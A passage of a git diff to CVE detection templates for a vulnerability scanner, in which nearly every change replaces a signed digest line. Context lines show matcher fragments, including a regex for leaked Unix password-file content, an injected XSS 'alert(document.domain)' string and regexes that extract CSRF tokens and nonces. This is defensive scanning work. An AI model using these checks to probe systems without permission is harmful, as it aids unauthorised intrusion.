4b0a00483046022100e2cd2b4b36c12ef855afc0cac09f36298010e442c61426eca62f5ea6e4315962022100913b98754a234e3457d7bcdb2a792c9d97477e636725d895925d9a5970fdb45a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 54adc8e270..1ef5966e7a 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and -# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f00ac1820f09dc2f52690a5b9e6749ef92e22a4164b6ef2b0e03033c158ac180220057e3a7b9782376145eaccd82f65f8f15e2e8984e22e30e6eb164e83739a90b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 75f4a12690..655d78afdb 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 307 -# digest: 490a0046304402200b9d41c0309ab333bc791e17f4889c4b508a20ade256857de387596a939fb4c902200510b2369cd933fdeb6f527cf54398cb913417dac88699d63249c20b88272874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203db449eb727a41b07d0e582621f7bf8311d223d978e2b1d42479c60493d3167602200669b920b812088dd3d6b6fb44cda73538b0d5adad8f3ed5be7064c405231aee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 83dd277a75..e04c5c458d 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b466d037adefaeb908fdb770e3a8c773b544a35e01cedbcc3d21ec482597445022100a852a81f01da7a5b8a26be44d2bbc941e3a1cc06e619f94fcc22ff1066d18e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 70954f8e2c..2568e62f01 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fbccb7770e584f307e973153aef2413de086a622bfdc9f2d7d75ffcdcc560f04022100c2426ac89b16016df32ade6f0ece4162582fb001bc8204b7d5e59d8a9a9b83f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 53d563fb1d..751c6e1847 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220218bdc2e0fa378e5ffcd162a69c37028a479680c6861d157c617c6d36fbfd5c4022100b7706b7c27cb0c75ea4ba4d4ecd5c5e5ee3e3d2712bad1e76dd7985fa47ca574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 6b1238c9e3..47d6eecaa3 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071fdb30dda1300c3e29520bafb640b6b446614f18c0ac21624e34c1dce2907c8022100b3e7889b0ab672263e4f677ec1cb3ae13d72bacc8e4a18172d1f636e9597ca5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 5953bb409d..beec3bb0bf 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed31baef3a743912069b65ba5acc47646dcaf490915517bdd8e0e7ad7000e63002201f52667a811d396e971bdb076b9e20faf5f2855da5529fd33c7f57c62aca15cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fcc61d97e45a24d1ba74a9e55262ae16608c317bd73c0a8af941946c2dedde202207a94d89889634d23f327197f984ab320b5b0fbaa5548393e88d780983082c9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 3b0ea2c9ea..706f6a28c1 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b1bc52241353b36e1a5999a82f529fbbc762b7a9979290d5bbe230ab8d331b1102201bfc8ecd065a544dbcd51dd648a5542814bd55243221a48cceccfba368e17784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200caed94f4b8e27ec84172f90ed66d6e4f8f48d0ef7a5a0a357277508b5a72bc90220296289a75e6d6fb85d9dc169017500c3b5068b79554b112583909bab61961620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index b626b3b4e7..77603026e6 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -71,4 +71,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true -# digest: 4a0a0047304502202102f0fca3b27948107e82e0f1edb665eef04e734cb8223f72f8610fd0a77db7022100f66594372604dbb07eac6b1f2e2eaa0d92054b7cf0f0179d3f3b2278a84506fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5fa11e07228baa851dfaa62aa39232ffa643fb0afb07d45b9896a821d672e9b02210089f9b35148f6eca98dfcb05a554b8116051cb414fd910f34a5e97dfef3c06658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index f2ae4ce67f..f2443e7cdc 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100deb484913d771058cb07f05ff44b039c31713806ae1d7dc76ab917a696784c1602204cc67b35d929a40ecbf2769707cf7c05748309ec523759fa82bd301d0c1751f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f76032d2bd41c6495a1860289244da3d82b38e08f0a848eb2518c5cd1da7700022100a1576d48ab95c0498cb797b6a0b47ba69036a19a7f60a940ef5af91db82e3648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 05ca9d4cce..995836d282 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -53,4 +53,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 490a0046304402203c485611836eec10a1ed541a3725bc35ddc5c20287b97f2ac232d2da614d03c202202fe8d887267e1145fd5315a3ce8588e05e684c7f439e5a7ca6ed2bf669c27137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008e6fc96139321b63c219be01deaba3cdcb5162125388950a7f6deb6ea2a880c022100e7f5d8a99f9197d292b76c18f45930d939eb1b884a19e6e1c1830d3773d84081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 49ca77dcfc..8a39da1959 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -86,4 +86,4 @@ http: regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true -# digest: 4a0a0047304502202048dbf451944c332d32cdf8e3e5afbd0760aad3b5c7ca8c8c9f5b8dc67c72c4022100cc0a5e2454e13a1a291ddb35096375206887fdc27eabed9aa389628c9cf910d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099fe2d391846a963b4a42e265f17285cd13e4453d388b83e971708525ba76393022100fe66b5447b1a2519e955e905fcbce32ef8cf6ae8c8171ed98e944af9f2fd34fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 31b4fed0e4..a720a454db 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cea582616645262451f278883a52ba23466fd71d17efc23fbe8aa5ee2a16c6a0220761185b2c6e66b8eb362c33c1f84a4517c8a9c07670e4e28002fe0ee4767c1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c791685793b8fb80abb043da7ae5f3710b1d65a1b3d9faa3ccf50495fe31d8c0220231ab3489ab8f6663a3af33c508d38391bbcdd97105dbe2e568b4f354d138d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index d1bfdc403d..2d8c4e0e5b 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e48f19893d9a16ba855d6f9730af410be8edc4eab9b16ef74fe2b8efe0053ec70220188c3998530c97f55e5c698dfd34fd5a9db1a22759017498b1d094525c774be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecf4d28cfa4d8e9acc7e30ed93c9a855b4ac47d0b0677e40a403af6b77ccbbaa02201c2965ab840d94e84d219352549c7bee2fa56db29dd22b4969220785e523a706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index c284284b0f..bb3bc7db63 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4276486bf740d5acd36f59842a4bb0b0c269c2f35c5b44b7636f342e3f67cea02204698566d89e3bfcb3a4f81b02a07c2ec2552a2b2c88e067bb333d25f7a346cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099aa294bb03eed7043659c0199250e623d100e601d57357d3553dc6fd561d7e1022100bad06d4676647348c828a779719ab60d9b7cfd97baa3c3c4d1903c935eb92c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index fe13730e16..1763b4379e 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100aa89454b284e35f82c58b79db719d9270edf456761c8aa7bded1254e7a8fd8fb022100a95aa00978443217fc6d8c9d178a21856ac5ac6e5aa0dcd44bcfb2ce9448c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206895f96e250c4be91711ed2cac3a327d92e20fbf215981d8c9000883a7cb4d4a022100eb905135cf53e657c56d9445973982611b1df000a17e82e05f063125d1b16422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 6876fc8541..efebcce6f1 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -45,4 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and -# digest: 4a0a0047304502205adf6288fe87134b556d34fbfea1ed592c7a42950b76ddfbb3c75d90cba774e7022100b0c41e62a09fa680a12f1210778fe7bf97dab393091e9727779d941a9f3a2056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d47bc70d11884729580f9172f27de7d226ef1abff961e2a9e8246e8252674068022100830090a0cd000b966340e2f0446c6b90c0d05bf9b5bbabcfe8fefe29e1bd24c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 33e6312cce..04a2881288 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -61,4 +61,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f417f9c6a9bc8988c5824b6075056008b654161a9396aff002ffca2e4bcce43022100a52a836cdaa54785747fbf37a4038560dc03ed7658de60a2e3b3df96f364c0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 21577707d9..39b11f9c55 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 301 -# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c524864438d26d3d4ec6a9fcdaac0a17f02193253ace57360911457dc1e1e3a9022100cc37241f61c4ba472282c4bf699ea37914b87f71bd093f14bc47ffc5a182f16c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 3217751e6f..945d8d35a3 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -83,4 +83,4 @@ http: regex: - 'type="hidden" value="(.*?)">' internal: true -# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe83b1242fcb8fe11714df6a287cde525554d92a497b22f7ede7908f4fb5cfb02205a1ddf89bd0b1863b1447050811ac7aef2af7efbc667369f3aa7964e666ebbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 7303890d0d..b478fb995a 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -67,4 +67,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d7851e48c4e4378d873ca3cb418e5f219d743c9e435e418b019e2ad5406d8ac022100a67ef8c0944a86563491b84687b0802d41eaf9aa23d6983ba84adcd92001651d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 7917c1968a..ab421f05e9 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and -# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0f18eda158c5fe7f0c8f8d7e80395bbe52d7bb9fcb75f542a040c53ce757735022054c276ee41a741ecd9a6f40d4d8d52581836eeb81214b9110ca47b6c6149a0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index d295726da5..2b2b7709de 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc7a4be2db79fa23a7322882eaee4e6265c68ed63a1f362330c9cdfc9cc6e080221008b8fe074d0e0ed77669e14a6d9485d5308a3f1daadeb7f96c155aab4c2dc56d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index cdb0f5b452..816d2ce143 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -48,4 +48,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa848372256d7eabf159884aa037d2138e09d0c0e9364174fb773e7750150b5b02205114c8a8a2cefe0b44d0a1bf4545e9497db91863201b990cb9b3d8ab8e430547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 8164ade2d3..f96d35b8d2 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b909b45dd43d102d789aceac9e83ac9b866ba5947d32ad06b7274a7bc8cb450220620859cb067102ad07e87d6df0236938224fa2233e831bd2a3ea100413a99c8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 7f438f0a4f..304af08190 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -44,4 +44,4 @@ http: - type: regex regex: - "root:[x*]:0:0" -# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e14c07ad587a3f6127ab6597730c3e3f61032076278d8cb85f9716bc1772e248022100824d3485478fe6a408364349dce3a19485ba0d97cc0000fed941aefb72e9bef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index da58a2fe39..cb1db7ffda 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207422cca17346734af8803e05435d968ee607fb4d1020131202813e2275ce90fd022100d04e21dd1aeed78f39fe54ffd517fc0697342080ce5c9031dc72b12c2278db35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 432e1b7944..d9cb8ada39 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220486e0cb03c2e34247dedc7a42f63cb1ed28d217628d3928db994c42f82eb87fc02203f6caf27418908145e8df9ef5e14d21bcec4f05d876ffaeb892707180ae6ad09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index db182f973a..38c81c3963 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220364ed7094ab718d0431d62a890a3195e8a44e770c3f86399f40e0ef3bf82e2e002210086e72e146fd8e3f380f84e27adf02191f4bd968348207d06486ee47d6f1e7f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 47e9ed5811..6396ed4103 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202704d1c9461ae76669983a31346667ea111b788f256f839824cbf7cf4827f63c0221008e40f7f3f0e50e9046c12b23cd755969d0e2634902e73a21392d7655069691fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 4c5cf2039d..09867aabce 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e289bfe0e9e294db8ec0302ed57729f551317c0e023ead21655a3094f8f53af7022100d799e09b724832d7efbc4cf2e89d16d68785ef1a9ee0af3b5fd3806d750bb936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 55a5b61b57..ecbc89d286 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c7ef3b8c12ab51dc33ff38f8ed0b048b9ca192ded1f57a3c2c8b201196cc3e4022069beb886ff9cc76db0c72220d36592f48578c9909c820680621dcc6f556abb2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index b71b44fa26..d3fd5a34f8 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8b489e0526233fadc0b71daa6165ce5043a99bcc11cfb0efec40a01d0adb68e022100c10051f21c0b7d95b703834dd555ff205cff4cd72e743f60787f628f9800bb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dbe51398af59064054a0f4a137661c719a7bbdfb4fba9a4416a0c8e329177ae02203007e3f7e09d32b655a478a58c1034a26954e59325f5d4946da39ce865b77473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 5db21049c2..14ab26f454 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -170,4 +170,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009254c581a66525d51374780544548b0fe6f6ae80401be65bd189894a7f566980022047ad24d5ffa12be36ccdc28b16554bebad6f96e3a4e0ef86623ac93beedba22e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 9f6cb66404..1d99c2f0ee 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -188,4 +188,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7cd418af97444eb54e6d2a1d5baa6163d10a42822a43a16dd45a3c3128484e9022100d9ff9dbf306d6c38bf75de7c7aa3bb289d403b5506c3617d761d657a7289651d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index b04ac726d0..70d7002717 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 